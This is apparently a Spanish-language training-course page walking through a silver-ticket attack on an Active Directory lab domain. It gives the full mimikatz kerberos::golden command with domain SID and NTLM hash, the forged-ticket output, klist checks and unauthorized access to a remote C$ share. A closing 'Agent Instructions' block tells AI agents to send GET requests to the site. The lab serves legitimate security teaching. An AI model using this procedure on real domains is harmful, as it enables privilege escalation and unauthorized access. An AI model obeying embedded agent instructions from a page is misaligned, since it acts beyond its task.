# Silver Ticket para CIFS Primero vamos a ejecutar el siguiente comando desde WebServer: ```bash C:\Users\adminwebserver>dir \\USER-SERVER.spartancybersec.corp\c$ Access is denied. C:\Users\adminwebserver>hostname WebServer C:\Users\adminwebserver>whoami spartancybersec\adminwebserver C:\Users\adminwebserver>ipconfig Windows IP Configuration Ethernet adapter Ethernet 2: Connection-specific DNS Suffix . : spartancybersec.corp Link-local IPv6 Address . . . . . : fe80::3dce:ac79:a1b0:7820%14 IPv4 Address. . . . . . . . . . . : 10.0.1.249 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.0.1.1 ``` En la evidencia previa, se puede apreciar que NO tenemos visibilidad contra el servidor USER-SERVER.spartancybersec.corp desde WEBSERVER.spartancybersec.corp Vamos a generar un silver ticket para el servicio de CIFS y para ello es necesario: * SID del dominio * HASH NTLM DE USER-SERVER El comando seria el siguiente: ```powershell C:\Users\Public\TOOLS>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /target:USER-SERVER.spartancybersec.corp /rc4:dadef894e564c991a5a5714e0a7efc67 /service:CIFS /ptt User : Administrator Domain : spartancybersec.corp (SPARTANCYBERSEC) SID : S-1-5-21-1861162130-2580302541-221646211 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: dadef894e564c991a5a5714e0a7efc67 - rc4_hmac_nt Service : CIFS Target : USER-SERVER.spartancybersec.corp Lifetime : 11/23/2023 7:14:27 PM ; 11/20/2033 7:14:27 PM ; 11/20/2033 7:14:27 PM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'Administrator @ spartancybersec.corp' successfully submitted for current session mimikatz # exit Bye! ``` Despues de lo anterior, podemos validar la existencia de nuestro ticket asi: ```powershell C:\Users\Public\TOOLS>klist Current LogonId is 0:0xae5fb Cached Tickets: (1) #0> Client: Administrator @ spartancybersec.corp Server: CIFS/USER-SERVER.spartancybersec.corp @ spartancybersec.corp KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40a00000 -> forwardable renewable pre_authent Start Time: 11/23/2023 19:14:27 (local) End Time: 11/20/2033 19:14:27 (local) Renew Time: 11/20/2033 19:14:27 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0 Kdc Called: ``` Y como resultado final podremos realizar una interaccion exitosa: ```powershell C:\Users\Public\TOOLS>dir \\USER-SERVER.spartancybersec.corp\c$ Volume in drive \\USER-SERVER.spartancybersec.corp\c$ has no label. Volume Serial Number is 4C79-B015 Directory of \\USER-SERVER.spartancybersec.corp\c$ 11/14/2018 06:56 AM EFI 05/13/2020 05:58 PM PerfLogs 09/24/2022 03:51 AM Program Files 09/19/2022 11:44 PM Program Files (x86) 11/23/2023 07:10 PM Users 11/13/2023 09:11 AM Windows 0 File(s) 0 bytes 6 Dir(s) 14,095,360,000 bytes free ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://books.spartan-cybersec.com/cpad/persistencia-y-post-explotacion-en-ad/silver-ticket/silver-ticket-para-cifs.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.